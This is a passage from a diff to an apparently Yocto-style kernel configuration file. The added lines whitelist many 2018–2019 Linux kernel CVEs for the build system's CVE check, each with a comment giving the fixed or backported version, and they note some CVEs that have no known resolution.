+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20836"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20854"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20855"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20856"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20961"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20976"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-21008"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-25015"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-25020"
+
+# CVE-2018-3574 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3620"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-3639"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3646"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3665"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3693"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5332"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5333"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5344"
+
+# fixed-version: Fixed after version 4.18rc7
+CVE_CHECK_WHITELIST += "CVE-2018-5390"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5391"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-5703"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5750"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5803"
+
+# fixed-version: Fixed after version 4.17rc6
+CVE_CHECK_WHITELIST += "CVE-2018-5814"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5848"
+
+# Skipping CVE-2018-5856, no affected_versions
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5873"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-5953"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-5995"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-6412"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-6554"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-6555"
+
+# CVE-2018-6559 has no known resolution
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-6927"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2018-7191"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7273"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-7480"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2018-7492"
+
+# fixed-version: Fixed after version 4.16rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7566"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-7740"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7754"
+
+# fixed-version: Fixed after version 4.19rc5
+CVE_CHECK_WHITELIST += "CVE-2018-7755"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-7757"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-7995"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-8043"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-8087"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8781"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8822"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8897"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9363"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9385"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9415"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9422"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2018-9465"
+
+# fixed-version: Fixed after version 4.18rc5
+CVE_CHECK_WHITELIST += "CVE-2018-9516"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9517"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9518"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2018-9568"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-0136"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0145"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0146"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0147"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0148"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0149"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-0154"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-0155"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10124"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10125"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-10126"
+
+# CVE-2019-10140 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10142"
+
+# fixed-version: Fixed after version 5.3rc3
+CVE_CHECK_WHITELIST += "CVE-2019-10207"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-10220"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10638"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-10639"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-11085"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11091"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-11135"
+
+# fixed-version: Fixed after version 4.8rc5
+CVE_CHECK_WHITELIST += "CVE-2019-11190"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11191"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-1125"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11477"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11478"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11479"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-11486"
+
+# fixed-version: Fixed after version 5.1rc5
+CVE_CHECK_WHITELIST += "CVE-2019-11487"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11599"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-11683"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11810"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11811"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-11815"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11833"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11884"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12378"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12379"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12380"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12381"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12382"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12454"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12455"
+
+# CVE-2019-12456 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12614"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-12615"
+
+# fixed-version: Fixed after version 5.2rc7
+CVE_CHECK_WHITELIST += "CVE-2019-12817"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-12818"
+
+# fixed-version: Fixed after version 5.0rc8
+CVE_CHECK_WHITELIST += "CVE-2019-12819"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12881"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-12984"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-13233"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-13272"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-13631"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-13648"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14283"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14284"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-14615"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14763"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14814"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14815"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14816"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14821"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14835"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-14895"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2019-14896"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2019-14897"
+
+# CVE-2019-14898 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.11
+CVE_CHECK_WHITELIST += "CVE-2019-14901"
+
+# fixed-version: Fixed after version 5.3rc8
+CVE_CHECK_WHITELIST += "CVE-2019-15030"
+
+# fixed-version: Fixed after version 5.3rc8
+CVE_CHECK_WHITELIST += "CVE-2019-15031"
+
+# fixed-version: Fixed after version 5.2rc2
+CVE_CHECK_WHITELIST += "CVE-2019-15090"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15098"
+
+# cpe-stable-backport: Backported in 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15099"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-15117"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-15118"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15211"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15212"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15213"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15214"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15215"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-15216"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15217"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15218"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15219"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15220"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-15221"
+
+# fixed-version: Fixed after version 5.3rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15222"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15223"
+
+# CVE-2019-15239 has no known resolution
+
+# CVE-2019-15290 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-15291"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15292"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-15504"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15505"
+
+# fixed-version: Fixed after version 5.3rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15538"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-15666"
+
+# CVE-2019-15791 has no known resolution
+
+# CVE-2019-15792 has no known resolution
+
+# CVE-2019-15793 has no known resolution
+
+# CVE-2019-15794 needs backporting (fixed from 5.12)
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15807"
+
+# CVE-2019-15902 has no known resolution
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15916"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15917"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15918"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15919"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15920"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15921"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15922"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15923"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15924"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15925"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15926"
+
+# fixed-version: Fixed after version 5.0rc2
+CVE_CHECK_WHITELIST += "CVE-2019-15927"
+
+# CVE-2019-16089 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16229"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16230"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-16231"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16232"
+
+# fixed-version: Fixed after version 5.4rc5
+CVE_CHECK_WHITELIST += "CVE-2019-16233"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-16234"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16413"
+
+# fixed-version: Fixed after version 5.3rc7
+CVE_CHECK_WHITELIST += "CVE-2019-16714"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-16746"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16921"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-16994"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16995"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17052"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17053"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17054"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17055"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17056"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-17075"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-17133"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17351"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-17666"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-18198"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-18282"
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-18660"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2019-18675"
+
+# CVE-2019-18680 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-18683"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-18786"
+
+# fixed-version: Fixed after version 5.1rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18805"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18806"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18807"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2019-18808"
+
+# cpe-stable-backport: Backported in 5.4.9
+CVE_CHECK_WHITELIST += "CVE-2019-18809"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18810"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18811"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18812"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-18813"
+
+# cpe-stable-backport: Backported in 5.4.43
+CVE_CHECK_WHITELIST += "CVE-2019-18814"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-18885"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19036"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19037"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2019-19039"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2019-19043"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19044"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19045"
+
+# cpe-stable-backport: Backported in 5.4.15
+CVE_CHECK_WHITELIST += "CVE-2019-19046"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19047"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19048"
+
+# fixed-version: Fixed after version 5.4rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19049"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19050"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19051"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19052"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19053"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2019-19054"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19055"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19056"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19057"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19058"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19059"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19060"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19061"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19062"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19063"
+
+# cpe-stable-backport: Backported in 5.4.13
+CVE_CHECK_WHITELIST += "CVE-2019-19064"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19065"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19066"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19067"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19068"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19069"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19070"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19071"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19072"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19073"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19074"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19075"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19076"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19077"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19078"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-19079"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19080"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19081"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19082"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19083"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19227"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2019-19241"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19252"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19318"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19319"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19332"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19338"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2019-19377"
+
+# CVE-2019-19378 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.4
+CVE_CHECK_WHITELIST += "CVE-2019-19447"
+
+# cpe-stable-backport: Backported in 5.4.60
+CVE_CHECK_WHITELIST += "CVE-2019-19448"
+
+# CVE-2019-19449 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.45
+CVE_CHECK_WHITELIST += "CVE-2019-19462"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19523"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-19524"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19525"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19526"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19527"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19528"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19529"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19530"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19531"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19532"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19533"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19534"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19535"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19536"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19537"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19543"
+
+# cpe-stable-backport: Backported in 5.4.2
+CVE_CHECK_WHITELIST += "CVE-2019-19602"
+
+# cpe-stable-backport: Backported in 5.4.2
+CVE_CHECK_WHITELIST += "CVE-2019-19767"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2019-19768"
+
+# cpe-stable-backport: Backported in 5.4.28
+CVE_CHECK_WHITELIST += "CVE-2019-19769"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2019-19770"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19807"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19813"
+
+# CVE-2019-19814 has no known resolution
+
